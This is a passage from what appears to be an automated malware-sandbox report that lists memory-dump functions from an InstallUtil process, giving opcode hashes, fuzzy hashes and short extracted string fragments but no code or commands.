                                Function 06758B59 Relevance: 1.3, Strings: 1, Instructions: 25COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3292294274.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_6750000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID: \Obq
                                • API String ID: 0-2878401908
                                • Opcode ID: e049928bced17d3750339e7f9c854c3dc1279c055a5d92e1721314369c526fc6
                                • Instruction ID: 43932d6ede1b870bc46991856b61e340466525c2daddfe99a619c822fee02d57
                                • Opcode Fuzzy Hash: e049928bced17d3750339e7f9c854c3dc1279c055a5d92e1721314369c526fc6
                                • Instruction Fuzzy Hash: 4DF0FE70A10129DFDB14EF94E859BAD7B76FF88705F204159E502A7394CBB41C42DF81
                                Function 067533C8 Relevance: .3, Instructions: 276COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000004.00000002.3292294274.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_6750000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 8738c97cc5c0b8820529a8f9cebd049bfc5c80f0cb476715b929430c1d887f3f
                                • Instruction ID: df6b583ccdaf3e95cfa27faae3b2d87c996119f3842c237c66acca2b416ea8a1
                                • Opcode Fuzzy Hash: 8738c97cc5c0b8820529a8f9cebd049bfc5c80f0cb476715b929430c1d887f3f
                                • Instruction Fuzzy Hash: 45A1F170B002169FDB55CB68C880A3EB7A6FF84360F1185A9D856CB3A5EB75EC42C791
                                Function 0675A328 Relevance: .2, Instructions: 234COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000004.00000002.3292294274.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_6750000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e0c48f9b3ed24b278fcbbfe39290e684c7751ded21ec0d611aecd4683b61e365
                                • Instruction ID: 0af50de26041dca0c5389170b37eda1077a275cb5f7e90f1a4a428861f531947
                                • Opcode Fuzzy Hash: e0c48f9b3ed24b278fcbbfe39290e684c7751ded21ec0d611aecd4683b61e365
                                • Instruction Fuzzy Hash: 4A61A171F000114FDF54AA7EC880A6FAADBAFD4224B254579D80EDB364DEB5DD0287D2
                                Function 067586C1 Relevance: .2, Instructions: 226COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000004.00000002.3292294274.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_6750000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 25a16ff4a5bcd7fc1f74f88bd845b882daa65d2fd6d12b50a1eb15c48f2ef3bb
                                • Instruction ID: efdcfc1a646a44228a6446a86b103e76346ddd9051538496d4d6ce033406eaa1
                                • Opcode Fuzzy Hash: 25a16ff4a5bcd7fc1f74f88bd845b882daa65d2fd6d12b50a1eb15c48f2ef3bb
                                • Instruction Fuzzy Hash: E6916E30E102199FDF60DF68C890B9DB7B1FF89304F208699D549AB255DB70AA85CF92
                                Function 067586D8 Relevance: .2, Instructions: 210COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000004.00000002.3292294274.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_6750000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 7840c56e00af96bebf6994c5c12e9f8a1679afc20fdf48477e9a49aea40d9e9c
                                • Instruction ID: 38018753481cec1d0a32a3e978880d9c8921e026a30649e030256f673c9de248
                                • Opcode Fuzzy Hash: 7840c56e00af96bebf6994c5c12e9f8a1679afc20fdf48477e9a49aea40d9e9c
                                • Instruction Fuzzy Hash: 3E914D30E102198BDF60DF68C890BADB7B1FF89304F208599D549BB355DB70AA85CF91
                                Function 06759698 Relevance: .1, Instructions: 130COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000004.00000002.3292294274.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_6750000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 2780e25ad21d7062b11be49e18e88cb05a26fb03b3c26eb15bbdadb46cebc456
                                • Instruction ID: 17a864a654567b1205869b6eb9154d85ca5b88d80bf1c0583dcdeaea763e9a66
                                • Opcode Fuzzy Hash: 2780e25ad21d7062b11be49e18e88cb05a26fb03b3c26eb15bbdadb46cebc456
                                • Instruction Fuzzy Hash: 6A41B674E00245CBDB75CF68C4C0ABEFBA2FB45310F258DAADA19D7241C675E941C791
                                Function 06759530 Relevance: .1, Instructions: 126COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000004.00000002.3292294274.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_6750000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 5b7e21ff7457cc025a7226c48acebd97daa44d604cb3225de2b5fc24facfa50e
                                • Instruction ID: 9fd0403a7c6cbf2b762e351182b90bea39eda19f3f80b43fb10cdec99611e569
                                • Opcode Fuzzy Hash: 5b7e21ff7457cc025a7226c48acebd97daa44d604cb3225de2b5fc24facfa50e
                                • Instruction Fuzzy Hash: F2417071E00609CFDF60CEA9C8C0ABEF7B6EB84310F11496AD616D7250D771E8998B91
                                Function 06756060 Relevance: .1, Instructions: 124COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000004.00000002.3292294274.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_6750000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 7d54949dcefef0a909302c89ba145281c7c48cc5adb204f9a7507fe95a3acf41
                                • Instruction ID: 4b9fd7b044b8b9b19cbfdbc99de5321fc009f66d05a07547b8af4069452e8143
                                • Opcode Fuzzy Hash: 7d54949dcefef0a909302c89ba145281c7c48cc5adb204f9a7507fe95a3acf41
                                • Instruction Fuzzy Hash: 8D415935E10118DFDB94CB99D884AFDB7B6EF88310F4580A6ED09E7261EB70AC51CB90
                                Function 06755D4F Relevance: .1, Instructions: 96COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000004.00000002.3292294274.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_6750000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 93451aeb384c818676bcf2660193cec5aed381a062f959aa1641fdcbcce9ba2a
                                • Instruction ID: 33a29a1fd9ed3701fffa2d32b8673efc507ad383e05b43c12bd8a6e4e37be0dc
                                • Opcode Fuzzy Hash: 93451aeb384c818676bcf2660193cec5aed381a062f959aa1641fdcbcce9ba2a
                                • Instruction Fuzzy Hash: 7C315031E106059BDB55CF65D894AAEF7F2FF89300F218519E806EB354DB70AC46CB51
                                Function 06755D60 Relevance: .1, Instructions: 91COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000004.00000002.3292294274.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_6750000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 44441df3c341b536dd1c57765e6e09562242764f470763da53bed548cf3567c4
                                • Instruction ID: fac49459adfd6e6c5689c412e8f814d0912304e6bd933a37d2209daa4185434e
                                • Opcode Fuzzy Hash: 44441df3c341b536dd1c57765e6e09562242764f470763da53bed548cf3567c4
                                • Instruction Fuzzy Hash: 26316031E102099BDB55CF64D894AAEB7F2FF89300F218529E805EB394DF70AC46CB51
                                Function 067573B8 Relevance: .1, Instructions: 73COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000004.00000002.3292294274.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_6750000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 649c165182a23481617c8e32db3889dcaed89f09d852b0275305547c8768366e
                                • Instruction ID: 71c5ee2ae381928ff64cead51140c8858a01ab0cb40829bc06a0055765d4af11
                                • Opcode Fuzzy Hash: 649c165182a23481617c8e32db3889dcaed89f09d852b0275305547c8768366e
                                • Instruction Fuzzy Hash: 63218030E002189FCF68DB68DC449EEBBF5EF49310F1149A9EA0AE7350DA719941CFA1
                                Function 0100D01C Relevance: .1, Instructions: 72COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000004.00000002.3286095830.000000000100D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0100D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_100d000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d5786064e1af2c6a82c4c0e8d491b08a0552bbebcd6f13af2239756ce9cb20fb
                                • Instruction ID: 687392504a8df6364959c844a15efb463b1305f1ad171d1b705db70cf2823275
                                • Opcode Fuzzy Hash: d5786064e1af2c6a82c4c0e8d491b08a0552bbebcd6f13af2239756ce9cb20fb
                                • Instruction Fuzzy Hash: 6A21D371604204DFEB16DFA8D984B16BFA5EB84354F20C5A9E98D4B296C33AD406CB72
                                Function 06758050 Relevance: .1, Instructions: 67COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000004.00000002.3292294274.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_6750000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 28dcdf06662899f7bd4b74b9521cac03d77614aa947c5588bfda9b677ab11084
                                • Instruction ID: cd2bafdffae97b988f5429f2f694e19e5450add8dab1a7901027140ab13a064f
                                • Opcode Fuzzy Hash: 28dcdf06662899f7bd4b74b9521cac03d77614aa947c5588bfda9b677ab11084
                                • Instruction Fuzzy Hash: B211A332B100295BDB54D6B8C8546BF72EA9BC8650F1184BAD80AE7344EE72DC0287D2
                                Function 06758041 Relevance: .1, Instructions: 62COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000004.00000002.3292294274.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_6750000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 10ef9451ee2a0b17b96f90406556fe2b8332b31696304a0f09579dfb31410ea4
                                • Instruction ID: d93384c8964bb0144148d7f0c7629cf1a986ee00720e322e693668bb11e0594f
                                • Opcode Fuzzy Hash: 10ef9451ee2a0b17b96f90406556fe2b8332b31696304a0f09579dfb31410ea4
                                • Instruction Fuzzy Hash: 5C01F936B110191BDB4596B8C9512FF66EBDBC8661F0185BAD80AD7340ED62CC0683E3
                                Function 06757CE1 Relevance: .1, Instructions: 58COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000004.00000002.3292294274.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_6750000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f9e6d03b1e4591ca9f1502d74e4b602c7e30c58661e04369acb6dbb3755bdd27
                                • Instruction ID: 9b792fa48c817dc214e0c04fbf1d07f63a4fea685e08146228476655df6b29ab
                                • Opcode Fuzzy Hash: f9e6d03b1e4591ca9f1502d74e4b602c7e30c58661e04369acb6dbb3755bdd27
                                • Instruction Fuzzy Hash: AA21D3B5D01259AFCB10DF9AD885ADEFFB8FB48710F10816AE918A7200C378A554CFE5
                                Function 067582C1 Relevance: .1, Instructions: 56COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000004.00000002.3292294274.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_6750000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b74967b78f37579798c0f7ff2a26a14cc5882d875b16c3d39fe612c739dcfa68
                                • Instruction ID: 39f7486be44f185ec7ee069a829c3df4a3eb654557549af06bbe0044803367ac
                                • Opcode Fuzzy Hash: b74967b78f37579798c0f7ff2a26a14cc5882d875b16c3d39fe612c739dcfa68
                                • Instruction Fuzzy Hash: 8501B136B101204BDB55D678D85473EBBEADFC9214F15886AE90ECB361ED65DC034392
                                Function 06753884 Relevance: .1, Instructions: 55COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000004.00000002.3292294274.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_6750000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 1ae16e0bc8fdcef7145465d6f13eb8d910fd4c66226a91e2d215b4f01b3d5578
                                • Instruction ID: 3ee931053db2b1281bb8f69377f0114d45a4ee978fed547f41d8bdbd6e9e28d5
                                • Opcode Fuzzy Hash: 1ae16e0bc8fdcef7145465d6f13eb8d910fd4c66226a91e2d215b4f01b3d5578
                                • Instruction Fuzzy Hash: A721F4B5D012599FCB00DF9AD884ADEFBF4FB48310F10816AE918A7240C3746954CBE5
                                Function 0100D017 Relevance: .1, Instructions: 53COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000004.00000002.3286095830.000000000100D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0100D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_100d000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                • Instruction ID: 71ea15a3db48f15bd8586a592fdbed05223a2e802ec7b629684331fa5f31c809
                                • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                • Instruction Fuzzy Hash: 8711D075504280CFDB12CF94D5C4B15FFA2FB44314F24C6AAE84D4B696C33AD40ACB62
                                Function 067582D0 Relevance: .1, Instructions: 51COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000004.00000002.3292294274.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_6750000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 1dececcba830fa930e4241a728e346366e06b93f66db585ac473631110090e15
                                • Instruction ID: 7c7600b0a91ba1ae103d33c5e77971726dcdbb16e865cac0fff9fd842ee14aa0
                                • Opcode Fuzzy Hash: 1dececcba830fa930e4241a728e346366e06b93f66db585ac473631110090e15
                                • Instruction Fuzzy Hash: 4C016D32B100240BDB65957D9854B3FB7DADBC9714F25847AE90EC7354EDA5DC024392
                                Function 06756052 Relevance: .0, Instructions: 44COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000004.00000002.3292294274.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_6750000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 618f34575e00f4bad4c1eaa0503ac67819119381edcfdb89783560a334975bd2
                                • Instruction ID: 3707339b53013e7e71cd5c3a3adca087f889edd9df7c83d2a3dc191045d88e59
                                • Opcode Fuzzy Hash: 618f34575e00f4bad4c1eaa0503ac67819119381edcfdb89783560a334975bd2
                                • Instruction Fuzzy Hash: BFF0A436E11128ABCF14CAD5EC409DDF779EB88251F004177E909A7210DB71841AC7A1
                                Function 00FFD628 Relevance: .0, Instructions: 36COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000004.00000002.3286025242.0000000000FFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FFD000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_ffd000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 3b11f02a68f411c4a3375cdb957061d661e70c2c7db1a55af267d74239fc0910
                                • Instruction ID: 4ab26532fa45f0ba0ea630622414148d8efb88cc4b04789d97ee5cf3e8b2a735
                                • Opcode Fuzzy Hash: 3b11f02a68f411c4a3375cdb957061d661e70c2c7db1a55af267d74239fc0910
                                • Instruction Fuzzy Hash: 63F0C2714043449EE7208F06C884B62FFA8EF51734F18C45AEE0C4A296C27A9840CAB5
                                Function 0675A5B8 Relevance: .0, Instructions: 32COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000004.00000002.3292294274.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_6750000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a8eb0b622f4ed50d294a28c5e0e86695095ec4e1e904c8c79554325321da0c2e
                                • Instruction ID: 06dee433249ac15b6a268075a21598606fcfd7dc98a9f70ae163f62bcdb29558
                                • Opcode Fuzzy Hash: a8eb0b622f4ed50d294a28c5e0e86695095ec4e1e904c8c79554325321da0c2e
                                • Instruction Fuzzy Hash: EEF06571D192487FEF51CBB0CD0AAAA776DDB02214F1185EAE808DB241E1B5DA818761
                                Function 0675A5C8 Relevance: .0, Instructions: 22COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000004.00000002.3292294274.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_6750000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 6e2bb0b0f53a8932eefd01e7f8a486f893ed8622574c78a66ca67547e4c28134
                                • Instruction ID: 54b9aac4acb4e9a545901cbf35d05707472703a05208f86d7621adf0fb636701
                                • Opcode Fuzzy Hash: 6e2bb0b0f53a8932eefd01e7f8a486f893ed8622574c78a66ca67547e4c28134
                                • Instruction Fuzzy Hash: 25E0C271E1010CABDF90CAB0C909B6E73ACE701214F2189F9DD08D7200E2B6CA418780

                                Non-executed Functions

                                Function 0675B618 Relevance: 19.2, Strings: 15, Instructions: 435COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3292294274.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_6750000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID: ,s\-$.5uq$/q\-$<q\-$Nq\-$Sq\-$hq\-$$]q$$]q$$]q$$]q$$]q$$]q$q\-$v\-
                                • API String ID: 0-3932888714
                                • Opcode ID: f51f54ea9d2a738e6a56e6eaef5707d96119eea5a925c4f518da41e17f9ea22f
                                • Instruction ID: 65c0e38c305cd62dd99dd42378486963b65407bd88a9c56731ee3552fa512486
                                • Opcode Fuzzy Hash: f51f54ea9d2a738e6a56e6eaef5707d96119eea5a925c4f518da41e17f9ea22f
                                • Instruction Fuzzy Hash: 9CF16E30B002099FDB58EFB5C5A06AEB7F6BF84740F218469D44A9B399DF749C46CB81
                                Function 0675F3D0 Relevance: 15.2, Strings: 12, Instructions: 249COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3292294274.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_6750000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID: OK\-$PK\-$bK\-$tK\-$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
                                • API String ID: 0-4028708143
                                • Opcode ID: 17236c406bd77c3ea9c84b2b12f79037f54b70785cda6886ef5f229786378bd9
                                • Instruction ID: 897dbdb7500424355e9cf879f721cf220aae3048c1bbb32509a0e29268a9b80c
                                • Opcode Fuzzy Hash: 17236c406bd77c3ea9c84b2b12f79037f54b70785cda6886ef5f229786378bd9
                                • Instruction Fuzzy Hash: AA917E30A002099FDF68EFA8D595BAE76F6EF84340F118469D846A7294DAB89C41CF91
                                Function 0675CF20 Relevance: 11.4, Strings: 9, Instructions: 190COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3292294274.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_6750000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID: ]\-$6]\-$LR]q$LR]q$R]\-$a]\-$q]\-$$]q$$]q
                                • API String ID: 0-3697922206
                                • Opcode ID: 40e02fd69aae445ec79a77acf290488da27cedf3d48a5de779e751b662f7d47d
                                • Instruction ID: 16b4cee87d1726eec5c7374931b7fd85097c447bf53efffe3b32a0a62cc3fb9b
                                • Opcode Fuzzy Hash: 40e02fd69aae445ec79a77acf290488da27cedf3d48a5de779e751b662f7d47d
                                • Instruction Fuzzy Hash: D761E031B002059FDB58EBA8C851A6EB7F6EF88750F1185A9E806DB3A5DE70DC01CB91
                                Function 0675CAD8 Relevance: 10.3, Strings: 8, Instructions: 298COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3292294274.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_6750000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID: =\\-$n\\-$y\\-$$]q$$]q$$]q$$]q$]\-
                                • API String ID: 0-3199654863
                                • Opcode ID: 6a433e0f4303e183214529ddc8eb8ae7615e9e04de76f4eb19f4c3306b599256
                                • Instruction ID: 96f17bddefd89bbba9598e2e34ab1dee9ed50443058827a7969b3e411fb95185
                                • Opcode Fuzzy Hash: 6a433e0f4303e183214529ddc8eb8ae7615e9e04de76f4eb19f4c3306b599256
                                • Instruction Fuzzy Hash: 85B12B30F002099FDB59EBA8C5957AEB7F6EF84300F258469D406EB355DAB5DC82CB81
                                Function 0675F078 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3292294274.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_6750000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID: ,E\-$3E\-$ME\-$SE\-$bE\-$kE\-$yE\-
                                • API String ID: 0-2142556206
                                • Opcode ID: 69a3e89175c4727a19ef96efaa2acdf4e686b797ae80a21c82ea047ad6436a51
                                • Instruction ID: c17728194eebebc60de00b242093eb2471c5c748f5b7c9374e1715c204e74e2e
                                • Opcode Fuzzy Hash: 69a3e89175c4727a19ef96efaa2acdf4e686b797ae80a21c82ea047ad6436a51
                                • Instruction Fuzzy Hash: 0D81D971B001066FEF589BB4D891B7E76F6AF84254F01C468D906EB384DFB8DC018B92
                                Function 0675F790 Relevance: 8.9, Strings: 7, Instructions: 174COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3292294274.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_6750000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID: 'J\-$VJ\-$|J\-$$]q$$]q$$]q$$]q
                                • API String ID: 0-3129388554
                                • Opcode ID: b43d6840a4697935717e2d05dbf54d10cbb15fce4cce9fc183811382f59f51a5
                                • Instruction ID: 481a603b1fbd28316834e7c5afd6f400c855ce1a21d7587eb0de316ea916802a
                                • Opcode Fuzzy Hash: b43d6840a4697935717e2d05dbf54d10cbb15fce4cce9fc183811382f59f51a5
                                • Instruction Fuzzy Hash: 4C51B230F00605ABCFA89F68D9906BE73F6EF84210F1185AAD846E7254DB79EC01CB51
                                Function 0675D198 Relevance: 7.8, Strings: 6, Instructions: 301COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3292294274.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_6750000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID: &B\-$6B\-$@C\-$IC\-$RC\-$kB\-
                                • API String ID: 0-1245943403
                                • Opcode ID: 19362d4db7b9cdab3b26e2996fde69783f64db4ccfe0e77459856e7a8418e8ce
                                • Instruction ID: d2e3b8417637ecbf6034d89b0b4d72792f591bb1a579cfaf01cdc77360fcea11
                                • Opcode Fuzzy Hash: 19362d4db7b9cdab3b26e2996fde69783f64db4ccfe0e77459856e7a8418e8ce
                                • Instruction Fuzzy Hash: 4EC16F30F002199FDB64DB74C851BAEB6F2AF89244F1085A9D40EEB355DE709D82CB91
                                Function 0675CAC7 Relevance: 7.8, Strings: 6, Instructions: 282COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3292294274.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_6750000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID: =\\-$n\\-$y\\-$$]q$$]q$]\-
                                • API String ID: 0-1591966148
                                • Opcode ID: 7fa618d49bab3396055f29df12a01679dc7befab05197cd1f1fb66063d95f8ad
                                • Instruction ID: 8e1e6ca3e56f57e913a433f5e5fa22b4e62a4dc7db1f1f7276359bf3d9af03f4
                                • Opcode Fuzzy Hash: 7fa618d49bab3396055f29df12a01679dc7befab05197cd1f1fb66063d95f8ad
                                • Instruction Fuzzy Hash: 83A15B30F002099BDB59EBA4C5917AEB7F6EF84300F25856DD406EB359DAB5DC82CB81
                                Function 0675EA60 Relevance: 7.7, Strings: 6, Instructions: 200COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3292294274.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_6750000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID: {\-$"{\-$>{\-$Z{\-$x{\-$x\-
                                • API String ID: 0-3744525720
                                • Opcode ID: fe1cc6ba46c50834fd1dd8855bd9e3bcce7efb00e17564a02d356fa11eeb659f
                                • Instruction ID: cd1258833992ff34618382e7d1ecaa2f5964771ec77073c67e28c2322453eb25
                                • Opcode Fuzzy Hash: fe1cc6ba46c50834fd1dd8855bd9e3bcce7efb00e17564a02d356fa11eeb659f
                                • Instruction Fuzzy Hash: 4551E530F001096FDB58EBB8D4917BD76F6EF88254F118169D90AEB784EFB19D028792
                                Function 0675B607 Relevance: 7.7, Strings: 6, Instructions: 182COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3292294274.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_6750000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID: ,s\-$.5uq$Nq\-$Sq\-$hq\-$q\-
                                • API String ID: 0-2365089651
                                • Opcode ID: 347e9112a6c0543a39df005fa9d202d9b03a08fc867af2a0caf0a17cf99c71d6
                                • Instruction ID: a23570ae21c961c4b4abeea594b3c59181d5d43d38d855b90727f8cbcdcd2a67
                                • Opcode Fuzzy Hash: 347e9112a6c0543a39df005fa9d202d9b03a08fc867af2a0caf0a17cf99c71d6
                                • Instruction Fuzzy Hash: 95615C70A013099FDF58EFA9C4607AEB7F6AF84740F208569D44AEB398DA709C41CB81
